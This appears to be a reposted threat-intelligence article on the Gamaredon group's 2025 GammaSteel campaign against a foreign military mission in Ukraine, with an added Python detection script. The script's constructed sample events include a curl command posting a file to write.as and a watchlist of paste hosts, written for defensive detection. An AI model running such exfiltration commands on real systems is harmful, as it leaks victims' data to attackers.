In recent reports, Symantec Threat Hunter researchers have highlighted the growing sophistication of the Russian-linked APT group Gamaredon, also known by various aliases such as Shuckworm, Armageddon, and Callisto. The group, notorious for its persistent targeting of Ukrainian entities since 2013, has recently broadened its scope to include a foreign military mission operating in Ukraine. Their latest campaign, which began in February 2025, leverages an updated version of the GammaSteel infostealer, with a particular focus on espionage operations against government and defense sectors.
Gamaredon Targets Ukrainian Military Mission with Updated Infostealer
The new campaign marks a significant escalation in the threat landscape, with Gamaredon deploying a more advanced iteration of the GammaSteel infostealer. The malware is being used to target key entities involved in a foreign military operation in Ukraine, underscoring the APT group’s continued interest in espionage and information gathering related to defense organizations.
Gamaredon has a well-established track record of launching cyberattacks on Ukrainian government, law enforcement, and defense agencies since its emergence in 2013. The group’s ongoing efforts to target Ukraine’s military operations illustrate their unwavering commitment to espionage, with attacks continuing well into 2025.
The latest campaign began in February 2025 and persisted throughout March, with the initial infection vector identified as a compromised removable drive. The updated GammaSteel version employed by Gamaredon is equipped with a variety of exfiltration methods, including cURL, Tor, and write.as. These methods allow for stealthy data exfiltration, with the added benefit of using widely trusted platforms to obscure the attackers’ origin.
Another critical aspect of this attack is Gamaredon’s shift in tactics. The APT group has evolved from using VBS-based malware to more advanced PowerShell-based scripts for obfuscation. This transition makes the group’s attacks harder to detect and analyze. The malware chain begins with the creation of a Windows Registry value under UserAssist, using “mshta.exe” via “explorer.exe” to launch a multi-stage infection sequence.
One of the first files involved in the attack chain, “NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms”, establishes a connection to a C2 server using URLs from platforms like Teletype, Telegram, and Telegraph. The second file continues the infection process by targeting both removable and network drives, creating shortcuts to execute “mshta.exe” and hide its activities.
As the campaign progressed, experts detected more malicious activity on the targeted networks. A script that contacted a C2 server exfiltrated system metadata before downloading a PowerShell command. This command triggered the download of an obfuscated script, which then initiated the download of two additional PowerShell scripts. One script focused on reconnaissance tasks, such as capturing system information, screenshots, and files, while the other deployed an updated version of GammaSteel to steal specific files from the target.
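The chain described above gives a defender two concrete process-level behaviours to look for: mshta.exe started by explorer.exe against a file that is not an HTA (the shortcut-and-regtrans-ms trick), and curl.exe posting to a publishing service such as write.as. The following is an added example written for this page, not code from Symantec, the article, or the malware itself. It runs two such rules over a handful of constructed Sysmon-style process-creation records; the ProcessEvent field names, the sample command lines, and the PASTE_HOSTS watchlist (seeded only with write.as, the one service the article names) are all assumptions of this example.

```python
"""Toy detection pass over constructed Sysmon-style process-creation records.

Added example for this article. The rules encode two behaviours the article
describes: explorer.exe launching mshta.exe with a non-.hta target, and
curl.exe talking to a paste/publishing service. Records are constructed.
"""
from dataclasses import dataclass
import re

# Hosts worth alerting on when curl.exe contacts them. write.as is the only
# service named in the article; extend this with your own watchlist.
PASTE_HOSTS = {"write.as"}

@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line as logged

def basename(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect_mshta_from_explorer(ev: ProcessEvent):
    """Rule 1: explorer.exe spawns mshta.exe against something that is not an .hta."""
    if basename(ev.image) != "mshta.exe" or basename(ev.parent_image) != "explorer.exe":
        return None
    # First argument after the image name, quoted or unquoted.
    m = re.search(r'mshta(?:\.exe)?\s+(?:"([^"]+)"|(\S+))', ev.command_line, re.I)
    target = (m.group(1) or m.group(2)) if m else ""
    if not target.lower().endswith(".hta"):
        return f"mshta.exe launched by explorer.exe with non-HTA target: {target}"
    return None

def detect_curl_to_paste_service(ev: ProcessEvent):
    """Rule 2: curl.exe contacting a host on the paste/publishing watchlist."""
    if basename(ev.image) != "curl.exe":
        return None
    for host in re.findall(r'https?://([^/\s"\']+)', ev.command_line, re.I):
        if host.lower() in PASTE_HOSTS:
            return f"curl.exe contacting {host} (parent {basename(ev.parent_image)})"
    return None

RULES = (detect_mshta_from_explorer, detect_curl_to_paste_service)

def scan(events):
    """Apply every rule to every event; return the list of finding strings."""
    findings = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append(msg)
    return findings

# Constructed sample telemetry (not real captures). Event 2 mirrors the
# regtrans-ms file name from the article; event 3 is a benign HTA launched by
# a vendor application and must not fire; event 5 is a benign download.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe",
                 "explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r'mshta.exe "E:\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms"'),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Vendor\app.exe",
                 r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "curl.exe -s -X POST https://write.as/ --data-binary @info.txt"),
    ProcessEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
                 "curl.exe -sO https://example.invalid/package.zip"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Rule 1 deliberately ignores mshta.exe runs whose target really is an .hta file, because explorer.exe spawning mshta.exe is exactly what happens when a user double-clicks a legitimate HTA; the signal is the mismatched target, not the parent alone. In a real deployment the events would come from Sysmon Event ID 1 or the equivalent EDR feed rather than the inline list.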
What Undercode Say:
Shuckworm’s shift towards more sophisticated techniques marks a distinct phase in the evolution of this group’s operations. Despite their relative lack of technical prowess compared to other Russian APT groups, Gamaredon has been relentless in adapting its tactics, evolving its malware to evade detection and refine its operational strategy.
The use of widely known services such as Tor and cURL reflects the group’s strategic aim to reduce the likelihood of detection by leveraging legitimate platforms to obscure the origin of their attacks. This reflects a growing trend in cyber warfare, where attackers, regardless of their skill levels, are utilizing available technologies to avoid raising suspicion. The group’s reliance on PowerShell for obfuscation and multi-stage malware deployment further demonstrates an increase in their operational sophistication.
The persistence of Gamaredon’s targeting of Ukrainian military assets and related foreign operations speaks to the geopolitical context surrounding these attacks. The ongoing conflict in Ukraine has made the country a focal point for both cyber espionage and cyber warfare, with a significant emphasis placed on military intelligence and strategic defense initiatives. By compromising foreign military missions operating within Ukraine, Gamaredon is not just targeting national entities but is also engaging in broader geopolitical espionage. This strategy could provide Russia with valuable intelligence that could influence military strategies or diplomatic relations in the region.
While Shuckworm may not possess the same technical finesse as more well-known Russian hacking groups like APT28 or APT29, its ability to carry out sustained campaigns with increasing sophistication shows how even less skilled actors can cause significant damage. This is particularly true when the target is focused on a high-value geopolitical objective, such as Ukraine’s defense capabilities. As we continue to see from this campaign, Gamaredon’s approach highlights an evolving trend: a focus on specific targets, prolonged campaigns, and a slow, steady increase in sophistication aimed at evading detection.
The group’s adaptability is evident, with each new iteration of their malware showing enhancements designed to thwart detection mechanisms. The use of removable drives as an initial infection vector, often overlooked in favor of more direct network-based attacks, further emphasizes the group’s persistence and creative approach to finding ways into high-value systems.
Despite their lack of cutting-edge technical ability, Gamaredon’s consistency and focus are qualities that have allowed them to remain a persistent threat in Ukraine. While other Russian APT groups may be more technically advanced, Shuckworm compensates for these shortcomings by making incremental improvements to their malware, effectively evolving their tools to stay one step ahead of defenders.
In conclusion, the attack on foreign military missions in Ukraine underscores a broader strategy of cyber espionage that is unlikely to slow down anytime soon. As this conflict continues, the strategic importance of information gathering, through both traditional espionage and cyber means, will only increase, making Shuckworm and other similar groups key players in the ongoing cyber warfare landscape.
Fact Checker Results:
- The use of PowerShell, Tor, and cURL as obfuscation methods aligns with modern cyberattack trends.
- Gamaredon’s sustained targeting of Ukraine and its military entities reflects ongoing geopolitical espionage efforts amidst the conflict.
References:
Reported By: securityaffairs.com